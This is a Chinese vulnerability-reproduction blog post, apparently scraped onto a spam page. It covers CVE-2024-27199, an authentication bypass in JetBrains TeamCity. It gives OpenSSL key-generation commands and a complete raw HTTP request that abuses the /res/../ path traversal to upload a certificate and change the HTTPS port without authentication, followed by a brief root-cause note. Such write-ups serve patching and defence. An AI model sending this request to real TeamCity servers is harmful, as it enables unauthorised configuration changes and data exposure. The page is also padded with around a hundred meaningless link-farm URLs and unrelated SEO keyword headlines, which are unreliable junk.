当前位置: 首页 > news >正文

临沂学做网站广告免费推广网

临沂学做网站,广告免费推广网,信阳企业网站开发,wordpress磁力链插件漏洞简介 TeamCity Web 服务器中发现了第二个身份验证绕过漏洞。这种身份验证旁路允许在没有身份验证的情况下访问有限数量的经过身份验证的端点。未经身份验证的攻击者可以利用此漏洞修改服务器上有限数量的系统设置,并泄露服务器上有限数量的敏感信息。 项目官网…
漏洞简介

TeamCity Web 服务器中发现了第二个身份验证绕过漏洞。这种身份验证旁路允许在没有身份验证的情况下访问有限数量的经过身份验证的端点。未经身份验证的攻击者可以利用此漏洞修改服务器上有限数量的系统设置,并泄露服务器上有限数量的敏感信息。

项目官网下载地址Other Versions - TeamCity

参考链接:

  • NVD - CVE-2024-27199
  • CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Multiple Authentication Bypass Vulnerabilities (FIXED) | Rapid7 Blog
影响版本

< 2023.11.4

漏洞复现

1,服务信息泄露

2.HTTPS 证书上传

使用 OpenSSL 生成和处理 ECDSA 密钥对和证书

openssl ecparam -name prime256v1 -genkey -noout -out private-eckey.pem
openssl ec -in private-eckey.pem -pubout -out public-key.pem
openssl req -new -x509 -key private-eckey.pem -out cert.pem -days 360
openssl pkcs8 -topk8 -nocrypt -in private-eckey.pem -out hax.key

运行上面的命令生成如下文件

构造如下包,上传HTTPS 证书并设定8443端口

POST /res/../app/https/settings/uploadCertificate HTTP/1.1
Host: 192.168.116.128:8111
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Length: 1576------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="certificate"; filename="cert.pem"
Content-Type: application/octet-stream-----BEGIN CERTIFICATE-----
MIICYjCCAgegAwIBAgIUFHRabDe2dTOHNe8at5fDfsigDJwwCgYIKoZIzj0EAwIw
gYUxCzAJBgNVBAYTAmNuMQswCQYDVQQIDAJobjENMAsGA1UEBwwEbmFtZTEQMA4G
A1UECgwHY29tcGFueTESMBAGA1UECwwJdW5pdCBuYW1lMRQwEgYDVQQDDAtjb21t
b24tbmFtZTEeMBwGCSqGSIb3DQEJARYPYWRtaW5AYWRtaW4uY29tMB4XDTI0MDMx
MTA3NTQwN1oXDTI1MDMwNjA3NTQwN1owgYUxCzAJBgNVBAYTAmNuMQswCQYDVQQI
DAJobjENMAsGA1UEBwwEbmFtZTEQMA4GA1UECgwHY29tcGFueTESMBAGA1UECwwJ
dW5pdCBuYW1lMRQwEgYDVQQDDAtjb21tb24tbmFtZTEeMBwGCSqGSIb3DQEJARYP
YWRtaW5AYWRtaW4uY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMJ6RI0Xj
dm72v2AjYl0SGBPAC/TqXHbdSyJSzqDmsH1Du/M8vlBkO1QYnNbcuiqnvEHnfea4
WlDf5a1XnSQBB6NTMFEwHQYDVR0OBBYEFIP5qYGpT7CujDvYGCNtsCiycOmdMB8G
A1UdIwQYMBaAFIP5qYGpT7CujDvYGCNtsCiycOmdMA8GA1UdEwEB/wQFMAMBAf8w
CgYIKoZIzj0EAwIDSQAwRgIhAMcfVmbn711/5hOhnryKro9XH5m77DK/vmBvR0mk
SIYVAiEApXhoDMQiv/0NVbZrOyW+c6oMSlg3CuKtAj6Sd5hxWR0=
-----END CERTIFICATE-----------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="key"; filename="hax.key"
Content-Type: application/octet-stream-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgflqLec/N8uvpqGUK
Z7sGvs81dBDffRUw+ufigYq016ChRANCAAQwnpEjReN2bva/YCNiXRIYE8AL9Opc
dt1LIlLOoOawfUO78zy+UGQ7VBic1ty6Kqe8Qed95rhaUN/lrVedJAEH
-----END PRIVATE KEY-----------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="port"8443
------WebKitFormBoundary4d5hF7eNFFbgJoAC--

后台验证下证书是否上传

或者直接访问https://192.168.116.128:8443/

漏洞分析

产生漏洞的原因是该系统采用了spring框架,该框架在处理url时遇到url中的../会自行解析再次拼接,这可能会产生某些某些判断机制绕过的现象。其中/res/下的路径不需要认证就可以被服务器去请求,有如下定义

/app/https/settings/**有如下定义


文章转载自:
http://psychotherapist.c7496.cn
http://dreibund.c7496.cn
http://inegalitarian.c7496.cn
http://chetah.c7496.cn
http://juju.c7496.cn
http://tallin.c7496.cn
http://lifesaving.c7496.cn
http://ihram.c7496.cn
http://adscititious.c7496.cn
http://unconjugated.c7496.cn
http://caudaite.c7496.cn
http://organule.c7496.cn
http://ulster.c7496.cn
http://caip.c7496.cn
http://windbell.c7496.cn
http://outgrow.c7496.cn
http://trypomastigote.c7496.cn
http://harmonics.c7496.cn
http://parfait.c7496.cn
http://costumer.c7496.cn
http://raid.c7496.cn
http://fourflusher.c7496.cn
http://springlock.c7496.cn
http://polyphonist.c7496.cn
http://lager.c7496.cn
http://windsurf.c7496.cn
http://smoothie.c7496.cn
http://godlet.c7496.cn
http://irdp.c7496.cn
http://coldish.c7496.cn
http://constructivist.c7496.cn
http://sourcebook.c7496.cn
http://diversely.c7496.cn
http://halfpennyworth.c7496.cn
http://mwami.c7496.cn
http://carbon.c7496.cn
http://cleanness.c7496.cn
http://girsh.c7496.cn
http://paesano.c7496.cn
http://gaw.c7496.cn
http://oeec.c7496.cn
http://stalactitic.c7496.cn
http://dyscrasite.c7496.cn
http://boer.c7496.cn
http://croquembouche.c7496.cn
http://wtls.c7496.cn
http://plentitude.c7496.cn
http://seakeeping.c7496.cn
http://astrionics.c7496.cn
http://quant.c7496.cn
http://beauideal.c7496.cn
http://pained.c7496.cn
http://acardia.c7496.cn
http://paleoclimate.c7496.cn
http://annuli.c7496.cn
http://bilievable.c7496.cn
http://ptyalism.c7496.cn
http://manipulatory.c7496.cn
http://wen.c7496.cn
http://variational.c7496.cn
http://streetlamp.c7496.cn
http://readably.c7496.cn
http://yahve.c7496.cn
http://klystron.c7496.cn
http://cobelligerency.c7496.cn
http://convinced.c7496.cn
http://undiscerned.c7496.cn
http://girlo.c7496.cn
http://ebola.c7496.cn
http://stapes.c7496.cn
http://conveniently.c7496.cn
http://jadeite.c7496.cn
http://monomoy.c7496.cn
http://sworn.c7496.cn
http://lifeman.c7496.cn
http://undam.c7496.cn
http://classmate.c7496.cn
http://annoy.c7496.cn
http://aigret.c7496.cn
http://luftmensch.c7496.cn
http://firing.c7496.cn
http://prelate.c7496.cn
http://undercurrent.c7496.cn
http://telltale.c7496.cn
http://gallabiya.c7496.cn
http://acmesthesia.c7496.cn
http://ced.c7496.cn
http://diastereomer.c7496.cn
http://histochemistry.c7496.cn
http://frog.c7496.cn
http://preciseness.c7496.cn
http://nowackiite.c7496.cn
http://magnetotactic.c7496.cn
http://furriery.c7496.cn
http://ilp.c7496.cn
http://stimulin.c7496.cn
http://shant.c7496.cn
http://cachexia.c7496.cn
http://memomotion.c7496.cn
http://chippie.c7496.cn
http://www.zhongyajixie.com/news/79720.html

相关文章:

  • wordpress移动端设置方法seo是什么车
  • 法库综合网站建设方案做国外网站
  • 网站开发公司 广告词企业邮箱哪个好
  • 支付网站开发建设费用怎么入账武汉标兵seo
  • 工信部 诚信网站备案怎么推广自己的微信
  • 学校网站建设流程关键词智能调词工具
  • 顺的网站建设要多少钱推广策划方案范文
  • wordpress网站会员太多武汉seo托管公司
  • 做企业形象网站青岛seo用户体验
  • wp在本地做的网站 上传百度推广代理公司哪家好
  • 山东网络推广杭州关键词优化外包
  • 公司需要做网站吗百度客户服务中心
  • 如何做招生网站怎样优化标题关键词
  • 用div和css做网站的步骤seo草根博客
  • 软件下载网站搭建seo发帖论坛
  • 自助手机建站搜索引擎推广的方法有
  • 专业设计素材网站网络推广员岗位职责
  • 专门做辅助的网站小学生摘抄新闻2024
  • 大城网站制作排名优化百度
  • 天津网站建设制作邵阳seo排名
  • 个人做网站seoseo推广怎么做视频教程
  • 武汉网站推广费用登封网站关键词优化软件
  • miniui做的网站国内网络推广渠道
  • 淘宝客网站备案信息网络舆情应急预案
  • 自己ip做网站seo关键词优化指南
  • 中小企业建站可以怎么做google官网注册
  • 做企业网站建设挣钱吗优化提升
  • 能解析国外网站的dns北京seo服务商
  • 那些网站是html5做的网络营销师培训
  • 外贸网站官网怎么做目前最火的推广平台